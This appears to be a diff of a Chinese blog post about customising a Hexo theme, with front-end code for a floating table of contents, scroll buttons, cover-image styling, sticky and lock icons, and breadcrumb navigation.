    transition: opacity 0.4s;
    color: #b3b3b3;
    -webkit-user-select: none; /* Safari */
    -moz-user-select: none; /* Firefox */
    -ms-user-select: none; /* IE 10+ */
    user-select: none;
    }

    .copy-button {
    position: absolute;
    width: 18px;
    height: 18px;
    right: 6px;
    border: none;
    background-color: rgba(0, 0, 0, 0);
    background-size: cover;
    top: 50%;
    transform: translateY(-50%);
    }

    .copy-button:hover
    {
    filter: brightness(120%);
    }

    .code-lang {
    font-weight: bold;
    position: absolute;
    left: 30px;
    font-size: 16px;
    color: #b3b3b3;
    }

    .close-code-block-button {
    position: absolute;
    width: 16px;
    height: 16px;
    bottom: 8px;
    left: 6px;
    border: none;
    background-color: rgba(0, 0, 0, 0);
    background-size: cover;
    transition: transform 0.4s;
    }
    }

    pre {
    .closed {
    height: 0;
    padding: 0 !important;
    overflow-y: hidden;
    }
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    .hightlight-tools {
    background: #e6ebf1;
    position: relative;
    height: 32px;

    .copy-notice {
    font-weight: 500;
    position: absolute;
    right: 30px;
    font-size: 14px;
    opacity: 0;
    transition: opacity 0.4s;
    color: #b3b3b3;
    -webkit-user-select: none; /* Safari */
    -moz-user-select: none; /* Firefox */
    -ms-user-select: none; /* IE 10+ */
    user-select: none;
    }

    .copy-button {
    position: absolute;
    width: 18px;
    height: 18px;
    right: 6px;
    border: none;
    background-color: rgba(0, 0, 0, 0);
    background-size: cover;
    top: 50%;
    transform: translateY(-50%);
    }

    .copy-button:hover
    {
    filter: brightness(120%);
    }

    .code-lang {
    font-weight: bold;
    position: absolute;
    left: 30px;
    font-size: 16px;
    color: #b3b3b3;
    }

    .close-code-block-button {
    position: absolute;
    width: 16px;
    height: 16px;
    bottom: 8px;
    left: 6px;
    border: none;
    background-color: rgba(0, 0, 0, 0);
    background-size: cover;
    transition: transform 0.4s;
    }
    }

    pre {
    .closed {
    height: 0;
    padding: 0 !important;
    overflow-y: hidden;
    }
    }

    右边栏及目录

    ​ 这个主题自带 toc 功能,用的是 hexo 自带的 toc 功能,但是啥布局也没写……就一直没用。

    @@ -595,7 +593,7 @@

    ​ 决定重新设计一个目录架构,放到文章右侧并实时跟随。

    ​ hexo-toc 插件跟 自带的 toc 冲突了,把它卸了。

    -
    npm uninstall hexo-toc
    +
    1
    npm uninstall hexo-toc

    方法论

    ​ 参考默认的 toc:辅助函数(Helpers)| Hexo

    ​ 使用 <%- toc(page.content,{list_number:false}) %> 语句就会一阵输出目录的内容:

    @@ -611,49 +609,49 @@

    rightside.ejs

  15. hidden 会让目录及其按钮隐藏起来,这是加密插件的存在而设计。
  16. toc.js 控制着目录生成的逻辑。
  17. -
    <%- js('js/goto_position.js') %>
    <style>
    .rightside-button-icon
    {
    width: 18px;
    height: 18px;
    -webkit-user-select: none; /* Chrome, Safari, Opera */
    -moz-user-select: none; /* Firefox */
    -ms-user-select: none; /* Internet Explorer/Edge */
    user-select: none; /* Non-prefixed version, supported by most modern browsers */
    }
    </style>

    <div style="z-index: 3; position: fixed; bottom: 10px; right: 20px; transition: all 0.5s ease-out;" id="rightside">
    <% if(page.toc) { %>
    <div class="post-toc hidden" id="post-toc">
    <span class="post-toc-title">导航</span>
    <ol class="toc"></ol>
    </div>
    <div class="rightside-button hidden" id="js-toc">
    <span>
    <img src="<%- theme.icon.toc %>" class="rightside-button-icon" alt="Icon">
    </span>
    </div>
    <%- js('js/toc.js');%>
    <script>
    initToc();
    </script>
    <% } %>
    <div class="rightside-button" id="js-go_top">
    <span>
    <img src="<%- theme.icon.go_top %>" class="rightside-button-icon" alt="Icon">
    </span>
    </div>
    <div class="rightside-button" id="js-go_bottom">
    <span>
    <img src="<%- theme.icon.go_bottom %>" class="rightside-button-icon" alt="Icon">
    </span>
    </div>
    </div>

    <script>
    $('#js-go_top')
    .gotoPosition( {
    speed: 300,
    target: 'top',
    } );
    $('#js-go_bottom')
    .gotoPosition( {
    speed: 300,
    target: 'bottom',
    } );
    </script>
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    <%- js('js/goto_position.js') %>
    <style>
    .rightside-button-icon
    {
    width: 18px;
    height: 18px;
    -webkit-user-select: none; /* Chrome, Safari, Opera */
    -moz-user-select: none; /* Firefox */
    -ms-user-select: none; /* Internet Explorer/Edge */
    user-select: none; /* Non-prefixed version, supported by most modern browsers */
    }
    </style>

    <div style="z-index: 3; position: fixed; bottom: 10px; right: 20px; transition: all 0.5s ease-out;" id="rightside">
    <% if(page.toc) { %>
    <div class="post-toc hidden" id="post-toc">
    <span class="post-toc-title">导航</span>
    <ol class="toc"></ol>
    </div>
    <div class="rightside-button hidden" id="js-toc">
    <span>
    <img src="<%- theme.icon.toc %>" class="rightside-button-icon" alt="Icon">
    </span>
    </div>
    <%- js('js/toc.js');%>
    <script>
    initToc();
    </script>
    <% } %>
    <div class="rightside-button" id="js-go_top">
    <span>
    <img src="<%- theme.icon.go_top %>" class="rightside-button-icon" alt="Icon">
    </span>
    </div>
    <div class="rightside-button" id="js-go_bottom">
    <span>
    <img src="<%- theme.icon.go_bottom %>" class="rightside-button-icon" alt="Icon">
    </span>
    </div>
    </div>

    <script>
    $('#js-go_top')
    .gotoPosition( {
    speed: 300,
    target: 'top',
    } );
    $('#js-go_bottom')
    .gotoPosition( {
    speed: 300,
    target: 'bottom',
    } );
    </script>

    goto_position.js

    ​ 魔改原来的 goTop.js 使其可以也滚动到底部:

    -
    (function ($) {
    jQuery.fn.gotoPosition = function (opt) {
    var ele = this;
    var win = $(window);
    var doc = $("html,body");
    var defaultOpt = {
    speed: 500,
    iconSpeed: 200,
    animationShow: {
    opacity: "1",
    },
    animationHide: {
    opacity: "0",
    },
    };
    var options = $.extend(defaultOpt, opt);

    ele.click(function () {
    var targetOffset = 0;
    if (opt && opt.target) {
    if (opt.target === "top") {
    targetOffset = 0; // 跳转至文档顶部
    } else if (opt.target === "bottom") {
    targetOffset = $(document).height() - win.height(); // 跳转至文档底部
    }
    }
    doc.animate(
    {
    scrollTop: targetOffset, // 将文档元素滚动到目标位置
    },
    options.speed
    );
    });
    };
    })(jQuery);
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    (function ($) {
    jQuery.fn.gotoPosition = function (opt) {
    var ele = this;
    var win = $(window);
    var doc = $("html,body");
    var defaultOpt = {
    speed: 500,
    iconSpeed: 200,
    animationShow: {
    opacity: "1",
    },
    animationHide: {
    opacity: "0",
    },
    };
    var options = $.extend(defaultOpt, opt);

    ele.click(function () {
    var targetOffset = 0;
    if (opt && opt.target) {
    if (opt.target === "top") {
    targetOffset = 0; // 跳转至文档顶部
    } else if (opt.target === "bottom") {
    targetOffset = $(document).height() - win.height(); // 跳转至文档底部
    }
    }
    doc.animate(
    {
    scrollTop: targetOffset, // 将文档元素滚动到目标位置
    },
    options.speed
    );
    });
    };
    })(jQuery);

    toc.js

    function initToc()

    ​ 初始化目录,如果文章没有被加密(类名为 hbehbe-content 的元素)不存在,则移除目录的 hidden 类。

    ​ 模仿 Butterfly,借助 localStorage 判断默认状态下是否显示目录。

    -
    function initToc() {
    // 检查是否存在具有类名为 'hbe' 和 'hbe-content' 的元素
    if ($('.hbe.hbe-content').length > 0) {
    // 如果存在该元素,则给 '.rightside-button' 和 '.post-toc' 添加 'hidden' 类
    $('.rightside-button, .post-toc').addClass('hidden');
    return;
    } else {
    // 找到类名为 .rightside-button 的元素,并移除 hidden 类
    $('.rightside-button').removeClass('hidden');
    // 找到类名为 .post-toc 的元素,并移除 hidden 类
    $('.post-toc').removeClass('hidden');
    }

    var value = localStorage.getItem('aside-status');
    if (value === null) { // 如果存储项不存在,则创建它
    localStorage.setItem('aside-status', "true");
    value = true;
    }
    if (value === "true") {
    $("#post-toc").addClass("show-toc");
    $("#content").addClass("show-toc");
    }
    createToc();
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    function initToc() {
    // 检查是否存在具有类名为 'hbe' 和 'hbe-content' 的元素
    if ($('.hbe.hbe-content').length > 0) {
    // 如果存在该元素,则给 '.rightside-button' 和 '.post-toc' 添加 'hidden' 类
    $('.rightside-button, .post-toc').addClass('hidden');
    return;
    } else {
    // 找到类名为 .rightside-button 的元素,并移除 hidden 类
    $('.rightside-button').removeClass('hidden');
    // 找到类名为 .post-toc 的元素,并移除 hidden 类
    $('.post-toc').removeClass('hidden');
    }

    var value = localStorage.getItem('aside-status');
    if (value === null) { // 如果存储项不存在,则创建它
    localStorage.setItem('aside-status', "true");
    value = true;
    }
    if (value === "true") {
    $("#post-toc").addClass("show-toc");
    $("#content").addClass("show-toc");
    }
    createToc();
    }
    createToc()

    创建目录:

    • <ol class="toc-child"></ol> 里不断追加元素
    • 点击目录中的元素会平滑跳转到对应的位置。
    -
    function createToc() {
    var toc = $('.toc');
    toc.empty();

    var headings = $('#content').find('h1, h2, h3, h4, h5, h6');
    var currentLevel = 1;
    var currentList = toc;

    for (var i = 0; i < headings.length; i++) {
    var heading = $(headings[i]);
    // ID 开头不能为数字,如果为了,加个下划线
    if (/^[0-9]/.test(heading.attr('id'))) {
    heading.attr('id', '_' + heading.attr('id'));
    }
    if (!heading.find('a').length) // 标题里没有<a>,可能是用户自己创建的标题,跳过
    continue;
    var level = parseInt(heading.prop('tagName').charAt(1));
    // 创建目录
    if (level > currentLevel) {
    for (var j = currentLevel + 1; j <= level; j++) {
    var newOl = $('<ol>').addClass('toc-child');
    var newLi = $('<li>').addClass('toc-item toc-level-level1-' + j);
    currentList.append(newLi);
    newLi.append(newOl);
    currentList = newOl;
    }
    } else if (level < currentLevel) {
    for (var j = level; j < currentLevel; j++) {
    currentList = currentList.parent().parent();
    }
    }
    var li = $('<li>').addClass('toc-item toc-level-level-' + level);
    // 获取 hrefValue
    var hrefValue = heading.html().match(/href="([^"]+)"/) ? heading.html().match(/href="([^"]+)"/)[1] : '';
    // ID 开头不能为数字,如果为了,加个下划线
    if (!isNaN(parseInt(hrefValue.charAt(1)))) {
    hrefValue = hrefValue.slice(0, 1) + "_" + hrefValue.slice(1);
    }
    // 获取 titleValue
    var titleValue = heading.html().match(/title="([^"]+)"/) ? heading.html().match(/title="([^"]+)"/)[1] : '';
    // 创建 <a>
    li.html('<a class="toc-link" href="' + hrefValue + '"><span class="toc-text">' + titleValue + '</span></a>');
    var a = li.find("a");
    // 重写点击目录时的跳转逻辑
    a.on("click", function (event) {
    event.preventDefault();
    var element = $($(this).attr("href"));
    var rect = element[0].getBoundingClientRect();
    var topOffset = rect.top + window.scrollY - 90; // 有顶端栏的存在,-90
    window.scrollTo({
    top: topOffset,
    behavior: "smooth"
    });
    });
    currentList.append(li);
    currentLevel = level;
    }
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    function createToc() {
    var toc = $('.toc');
    toc.empty();

    var headings = $('#content').find('h1, h2, h3, h4, h5, h6');
    var currentLevel = 1;
    var currentList = toc;

    for (var i = 0; i < headings.length; i++) {
    var heading = $(headings[i]);
    // ID 开头不能为数字,如果为了,加个下划线
    if (/^[0-9]/.test(heading.attr('id'))) {
    heading.attr('id', '_' + heading.attr('id'));
    }
    if (!heading.find('a').length) // 标题里没有<a>,可能是用户自己创建的标题,跳过
    continue;
    var level = parseInt(heading.prop('tagName').charAt(1));
    // 创建目录
    if (level > currentLevel) {
    for (var j = currentLevel + 1; j <= level; j++) {
    var newOl = $('<ol>').addClass('toc-child');
    var newLi = $('<li>').addClass('toc-item toc-level-level1-' + j);
    currentList.append(newLi);
    newLi.append(newOl);
    currentList = newOl;
    }
    } else if (level < currentLevel) {
    for (var j = level; j < currentLevel; j++) {
    currentList = currentList.parent().parent();
    }
    }
    var li = $('<li>').addClass('toc-item toc-level-level-' + level);
    // 获取 hrefValue
    var hrefValue = heading.html().match(/href="([^"]+)"/) ? heading.html().match(/href="([^"]+)"/)[1] : '';
    // ID 开头不能为数字,如果为了,加个下划线
    if (!isNaN(parseInt(hrefValue.charAt(1)))) {
    hrefValue = hrefValue.slice(0, 1) + "_" + hrefValue.slice(1);
    }
    // 获取 titleValue
    var titleValue = heading.html().match(/title="([^"]+)"/) ? heading.html().match(/title="([^"]+)"/)[1] : '';
    // 创建 <a>
    li.html('<a class="toc-link" href="' + hrefValue + '"><span class="toc-text">' + titleValue + '</span></a>');
    var a = li.find("a");
    // 重写点击目录时的跳转逻辑
    a.on("click", function (event) {
    event.preventDefault();
    var element = $($(this).attr("href"));
    var rect = element[0].getBoundingClientRect();
    var topOffset = rect.top + window.scrollY - 90; // 有顶端栏的存在,-90
    window.scrollTo({
    top: topOffset,
    behavior: "smooth"
    });
    });
    currentList.append(li);
    currentLevel = level;
    }
    }
    $(“#js-toc”).click()

    ​ 点击按钮,控制目录是否展示。

    -
    $("#js-toc").click(function () {
    var postToc = $("#post-toc");
    var content = $("#content");
    if (!postToc.hasClass("show-toc")) {
    localStorage.setItem('aside-status', true);
    content.addClass("show-toc");
    postToc.addClass("show-toc");
    } else {
    content.removeClass("show-toc");
    postToc.removeClass("show-toc");
    localStorage.setItem('aside-status', false);
    }
    });
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    $("#js-toc").click(function () {
    var postToc = $("#post-toc");
    var content = $("#content");
    if (!postToc.hasClass("show-toc")) {
    localStorage.setItem('aside-status', true);
    content.addClass("show-toc");
    postToc.addClass("show-toc");
    } else {
    content.removeClass("show-toc");
    postToc.removeClass("show-toc");
    localStorage.setItem('aside-status', false);
    }
    });

    ​ 用于控制目录是否显示,送它一个 show-toc 类,剩下的交给 less。

    function getTopHeadingId()

    ​ 获取当前网页最顶端标题的 id,抄着下面的代码,-110 是考虑到了主题顶端栏的存在:

    -
    function getTopHeadingId() {
    const headings = document.querySelector('#content').querySelectorAll('h1, h2, h3, h4, h5, h6');
    let topHeadingId = null;
    let minDistanceFromTop = Infinity;
    for (const heading of headings) {
    const boundingRect = heading.getBoundingClientRect();
    const distanceFromTop = Math.abs(boundingRect.y - 90);
    if (distanceFromTop < minDistanceFromTop) {
    minDistanceFromTop = distanceFromTop;
    topHeadingId = heading.id;
    }
    }
    return topHeadingId;
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    function getTopHeadingId() {
    const headings = document.querySelector('#content').querySelectorAll('h1, h2, h3, h4, h5, h6');
    let topHeadingId = null;
    let minDistanceFromTop = Infinity;
    for (const heading of headings) {
    const boundingRect = heading.getBoundingClientRect();
    const distanceFromTop = Math.abs(boundingRect.y - 90);
    if (distanceFromTop < minDistanceFromTop) {
    minDistanceFromTop = distanceFromTop;
    topHeadingId = heading.id;
    }
    }
    return topHeadingId;
    }
    document.addEventListener()

    ​ 目录会根据当前所在位置高亮标题,送它一个 active 类,剩下的交给 less。

    ​ 当当前标题不在显示范围时,再给它强行滚动到可见范围。

    -
    document.addEventListener("scroll", function (event) {
    const tocLinks = document.querySelectorAll('a.toc-link');
    const topHeadingId = getTopHeadingId();
    tocLinks.forEach(link => {
    var href = decodeURIComponent(link.getAttribute('href')).replace(/^#/, '');;
    if (href == topHeadingId) {
    if (!link.classList.contains('active')) {
    link.classList.add("active");
    var toc = document.querySelector(".toc");
    var activeItem = toc.querySelector(".active");
    if (activeItem) {
    toc.scrollTo({
    top: activeItem.offsetTop - 100
    });
    }
    }
    } else {
    link.classList.remove("active");
    }
    });
    }, 3000);
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    document.addEventListener("scroll", function (event) {
    const tocLinks = document.querySelectorAll('a.toc-link');
    const topHeadingId = getTopHeadingId();
    tocLinks.forEach(link => {
    var href = decodeURIComponent(link.getAttribute('href')).replace(/^#/, '');;
    if (href == topHeadingId) {
    if (!link.classList.contains('active')) {
    link.classList.add("active");
    var toc = document.querySelector(".toc");
    var activeItem = toc.querySelector(".active");
    if (activeItem) {
    toc.scrollTo({
    top: activeItem.offsetTop - 100
    });
    }
    }
    } else {
    link.classList.remove("active");
    }
    });
    }, 3000);

    toc.less

    ​ 继续模仿 Butterfly 的布局,展示目录的时候,主页面会向左移动,同时写了移动端的适配。

    -
    .post-toc {
    border-radius: 10px;
    background: rgba(255, 255, 255, 0.9);
    box-shadow: 0 0 40px 0 rgba(50, 50, 50, 0.08);
    padding: 10px 5px 10px 5px;
    border: 1px solid rgba(18, 24, 58, 0.06);

    .post-toc-title {
    margin-left: 15px;
    font-weight: bold;
    color: #424242;
    font-size: 18px;
    }

    .toc {
    margin: 12px 5px 5px 5px;
    display: block;
    overflow: auto;
    }
    .toc::-webkit-scrollbar {
    width: 5px;
    height: 5px;
    }

    .toc::-webkit-scrollbar-thumb {
    background-color: #AAA; /* 修改滚动条滑块的颜色 */
    border-radius: 10px;
    }


    a {
    text-decoration: none;
    }

    ol {
    display: inline;
    list-style-type: none;

    a.active.toc-link {
    .toc-text {
    color: #FFF;
    }
    }

    .toc-link {
    margin-right: 5px;
    padding-top: 5px;
    padding-bottom: 5px;
    display: block;
    }

    li {
    margin-left: 10px;
    background: none;

    .toc-text {
    padding: 0 5px;
    color: #898fa0;
    }

    .active {
    span{
    padding: 4px 10px;
    border-radius: 8px;
    background: rgba(0, 106, 255, 0.8);
    }
    }

    }

    span:hover {
    color: #4183c4;
    }
    }
    }

    @media screen and (min-width: 1100px) {
    .post-toc {
    z-index: 2;
    position: fixed;
    bottom: 200px;
    width: 260px;
    right: -250px;
    transition: right 0.5s ease-out;
    }

    .toc {
    max-height: 40vh;
    }

    .post-toc.show-toc {
    right: min(30px, 2vw);
    }

    .post-toc.show-toc.hidden{
    right: -250px;
    }

    .post-content.show-toc{
    max-width: min(960px, 80vw);
    transform: translateX(calc(-0.1 * min(960px, 80vw)));
    }
    }

    @media screen and (max-width: 1100px) {
    .post-toc {
    z-index: 2;
    position: fixed;
    bottom: -30vh;
    min-width: 40vw;
    max-width: calc(75vw - 10px);
    right: min(70px, calc(10vw + 30px));
    margin-left: 20px;
    transition: bottom 0.5s ease-out;
    }

    .toc {
    max-height: 16vh;
    }

    .post-toc.show-toc {
    bottom: 20px;
    }

    .post-toc.show-toc.hidden{
    right: -30vh;
    }
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    .post-toc {
    border-radius: 10px;
    background: rgba(255, 255, 255, 0.9);
    box-shadow: 0 0 40px 0 rgba(50, 50, 50, 0.08);
    padding: 10px 5px 10px 5px;
    border: 1px solid rgba(18, 24, 58, 0.06);

    .post-toc-title {
    margin-left: 15px;
    font-weight: bold;
    color: #424242;
    font-size: 18px;
    }

    .toc {
    margin: 12px 5px 5px 5px;
    display: block;
    overflow: auto;
    }
    .toc::-webkit-scrollbar {
    width: 5px;
    height: 5px;
    }

    .toc::-webkit-scrollbar-thumb {
    background-color: #AAA; /* 修改滚动条滑块的颜色 */
    border-radius: 10px;
    }


    a {
    text-decoration: none;
    }

    ol {
    display: inline;
    list-style-type: none;

    a.active.toc-link {
    .toc-text {
    color: #FFF;
    }
    }

    .toc-link {
    margin-right: 5px;
    padding-top: 5px;
    padding-bottom: 5px;
    display: block;
    }

    li {
    margin-left: 10px;
    background: none;

    .toc-text {
    padding: 0 5px;
    color: #898fa0;
    }

    .active {
    span{
    padding: 4px 10px;
    border-radius: 8px;
    background: rgba(0, 106, 255, 0.8);
    }
    }

    }

    span:hover {
    color: #4183c4;
    }
    }
    }

    @media screen and (min-width: 1100px) {
    .post-toc {
    z-index: 2;
    position: fixed;
    bottom: 200px;
    width: 260px;
    right: -250px;
    transition: right 0.5s ease-out;
    }

    .toc {
    max-height: 40vh;
    }

    .post-toc.show-toc {
    right: min(30px, 2vw);
    }

    .post-toc.show-toc.hidden{
    right: -250px;
    }

    .post-content.show-toc{
    max-width: min(960px, 80vw);
    transform: translateX(calc(-0.1 * min(960px, 80vw)));
    }
    }

    @media screen and (max-width: 1100px) {
    .post-toc {
    z-index: 2;
    position: fixed;
    bottom: -30vh;
    min-width: 40vw;
    max-width: calc(75vw - 10px);
    right: min(70px, calc(10vw + 30px));
    margin-left: 20px;
    transition: bottom 0.5s ease-out;
    }

    .toc {
    max-height: 16vh;
    }

    .post-toc.show-toc {
    bottom: 20px;
    }

    .post-toc.show-toc.hidden{
    right: -30vh;
    }
    }

    dispatch_event.js

    ​ 新版的 hexo-blog-encrypt 提供了解密后的回调函数,更新这个插件:

    -
    npm update hexo-blog-encrypt
    +
    1
    npm update hexo-blog-encrypt

    After Decrypt Event

    Thanks to @f-dong, we now will trigger a event named hexo-blog-decrypt, so you can add a call back to listen to that event.

    -
    // trigger event
    var event = new Event('hexo-blog-decrypt');
    window.dispatchEvent(event);
    +
    1
    2
    3
    // trigger event
    var event = new Event('hexo-blog-decrypt');
    window.dispatchEvent(event);

    ​ 在解密后重新初始化目录:

    -
    // trigger event
    var event = new Event('hexo-blog-decrypt');
    window.dispatchEvent(event);

    // 定义回调函数
    function handleHexoBlogDecryptEvent() {
    console.log("文章解密成功!");
    initToc();
    }

    // 添加事件监听器
    window.addEventListener('hexo-blog-decrypt', handleHexoBlogDecryptEvent);
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    // trigger event
    var event = new Event('hexo-blog-decrypt');
    window.dispatchEvent(event);

    // 定义回调函数
    function handleHexoBlogDecryptEvent() {
    console.log("文章解密成功!");
    initToc();
    }

    // 添加事件监听器
    window.addEventListener('hexo-blog-decrypt', handleHexoBlogDecryptEvent);

    演示

    ​ 电脑端:

    png

    @@ -666,17 +664,17 @@

    代码

    home.ejs

    ​ 修改 home.ejs,增加 post.cover_style 变量允许文章头部的 yaml 控制标题图的 style:

    -
    <div class="img-container">
    <img style="<%- post.cover_style || '' %>" src="<%= post.cover ? post.cover : theme.default_cover %>" alt="Cover">
    </div>
    +
    1
    2
    3
    <div class="img-container">
    <img style="<%- post.cover_style || '' %>" src="<%= post.cover ? post.cover : theme.default_cover %>" alt="Cover">
    </div>

    home.less

    ​ 对应 less:

    -
    .img-container {
    width: 100%;
    height: 200px;
    background: @headerBackgroundColor;
    position: relative;
    img {
    width: 100%;
    height: 100%;
    object-fit: cover;
    display: block;
    }
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    .img-container {
    width: 100%;
    height: 200px;
    background: @headerBackgroundColor;
    position: relative;
    img {
    width: 100%;
    height: 100%;
    object-fit: cover;
    display: block;
    }
    }

    超框图制作

    ​ 用 PS 修一个超框图,就决定是你了,癫狂公爵西塔尔!疯子也要有教养。

    ​ 我一般的 cover 都是设成 800px * 450px 的,这个封面图设置为 800px * 738px,用 PS 保证“框”的高度为 450px,“框“的顶部距离画面顶部 150px。

    png

    cover_style

    ​ 文章自定义 cover_style

    -
    cover_style: "height: 164%; position: absolute; top: 0; left: 0; transform: translateY(-20.3%);"
    +
    1
    cover_style: "height: 164%; position: absolute; top: 0; left: 0; transform: translateY(-20.3%);"

    ​ 覆盖之前的封面图样式:

    • height: 164%;:由 738 / 450 = 1.64 得到。
    • @@ -690,10 +688,10 @@

      ​ 对于含有 top 属性的文章,增加一个置顶图标。

      代码

      home.ejs

      -
      <% if(post.top){ %>
      <img src="<%= theme.icon.stiky %>" class="stiky" alt="Icon">
      <% } %>
      +
      1
      2
      3
      <% if(post.top){ %>
      <img src="<%= theme.icon.stiky %>" class="stiky" alt="Icon">
      <% } %>

      home.less

      ​ 对应的:

      -
      .stiky{
      width: 18px;
      height: 18px;
      margin: 8px 6px 0 0;
      }
      +
      1
      2
      3
      4
      5
      .stiky{
      width: 18px;
      height: 18px;
      margin: 8px 6px 0 0;
      }

      演示

      png

      加密图标

      @@ -703,7 +701,7 @@

      代码

      home.ejs

      ​ 根据 post.password 的值是否为空判断这个文章是否被加密。

      -
      <img src="<%- post.password ? theme.icon.locked : theme.icon.normal %>" class="meat-type" alt="Icon">
      +
      1
      <img src="<%- post.password ? theme.icon.locked : theme.icon.normal %>" class="meat-type" alt="Icon">

      演示

      png

      面包屑导航栏

      @@ -712,9 +710,9 @@

      header.ejs

      ​ 添加一个 <ul> 以放置导航栏。

      -
      <div class="h-left">
      <a href="<%= theme.menus_link.home %>" class="logo">
      <img src="<%- theme.logo %>" alt="Quiet">
      </a>
      <ul class="breadcrumb" id="breadcrumb"></ul>
      </div>
      +
      1
      2
      3
      4
      5
      6
      <div class="h-left">
      <a href="<%= theme.menus_link.home %>" class="logo">
      <img src="<%- theme.logo %>" alt="Quiet">
      </a>
      <ul class="breadcrumb" id="breadcrumb"></ul>
      </div>

      ​ 底部调用 js,并传参(从 yaml 传参给 JS 还蛮复杂的,要花点脑经):

      -
      <%- js('js/breadcrumb.js') %>
      <script>
      var menus_title = [];
      <% Object.keys(theme.menus_title).forEach(function(menu) { %>
      menus_title.push({<%= menu %>: '<%= theme.menus_title[menu] %>'});
      <% }); %>
      <% if(page.categories){ %>
      <% page.categories.data.map((cat)=>{ %>
      categoriesBreadcrumb(document.getElementById('breadcrumb'), "<%- cat.name %>", "/categories/<%- cat.name %>");
      <% }) %>
      <% } else { %>
      customBreadcrumb(document.getElementById('breadcrumb'), menus_title);
      <% } %>
      </script>
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      <%- js('js/breadcrumb.js') %>
      <script>
      var menus_title = [];
      <% Object.keys(theme.menus_title).forEach(function(menu) { %>
      menus_title.push({<%= menu %>: '<%= theme.menus_title[menu] %>'});
      <% }); %>
      <% if(page.categories){ %>
      <% page.categories.data.map((cat)=>{ %>
      categoriesBreadcrumb(document.getElementById('breadcrumb'), "<%- cat.name %>", "/categories/<%- cat.name %>");
      <% }) %>
      <% } else { %>
      customBreadcrumb(document.getElementById('breadcrumb'), menus_title);
      <% } %>
      </script>

      ​ 设计两种面包屑导航栏:

        @@ -722,14 +720,14 @@
      • categoriesBreadcrumb 对于常规的推文,根据它的类别生成导航栏。

      function customBreadcrumb()

      -
      function customBreadcrumb(breadcrumb, menus_title) {
      // 获取当前页面路径
      var path = window.location.pathname;
      var levels = path.split('/');
      levels.shift(); // 移除第一个空字符串元素
      levels.pop(); // 移除最后一个空字符串元素

      // 生成面包屑导航
      for (var i = 0; i < levels.length; i++) {
      var levelLink = '/';
      for (var j = 0; j <= i; j++) {
      levelLink += levels[j] + '/';
      }
      var levelName = decodeURIComponent(levels[i]);

      if (i === 0) {
      // 查找 menus_title 中与 levelName 相同的键,并获取对应的值
      var title_obj = menus_title.find(function(item) {
      return item[levelName] !== undefined;
      });
      var title_value = title_obj ? title_obj[levelName] : null;
      if (!title_value) {
      return; // 如果找不到对应的值,直接返回,不执行后续代码
      }
      }
      }

      // 如果代码执行到这里,说明所有的值都能找到,可以继续添加元素到面包屑导航栏
      for (var i = 0; i < levels.length; i++) {
      var levelLink = '/';
      for (var j = 0; j <= i; j++) {
      levelLink += levels[j] + '/';
      }
      var levelName = decodeURIComponent(levels[i]);
      var li = document.createElement('li');
      var a = document.createElement('a');
      {
      if (i === 0) {
      a.textContent = title_value;
      } else {
      a.textContent = levelName;
      }
      if(i == levels.length - 1) {
      a.classList.add("last");
      }
      a.href = levelLink;
      }
      li.appendChild(a);
      breadcrumb.appendChild(li);
      }
      }
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      function customBreadcrumb(breadcrumb, menus_title) {
      // 获取当前页面路径
      var path = window.location.pathname;
      var levels = path.split('/');
      levels.shift(); // 移除第一个空字符串元素
      levels.pop(); // 移除最后一个空字符串元素

      // 生成面包屑导航
      for (var i = 0; i < levels.length; i++) {
      var levelLink = '/';
      for (var j = 0; j <= i; j++) {
      levelLink += levels[j] + '/';
      }
      var levelName = decodeURIComponent(levels[i]);

      if (i === 0) {
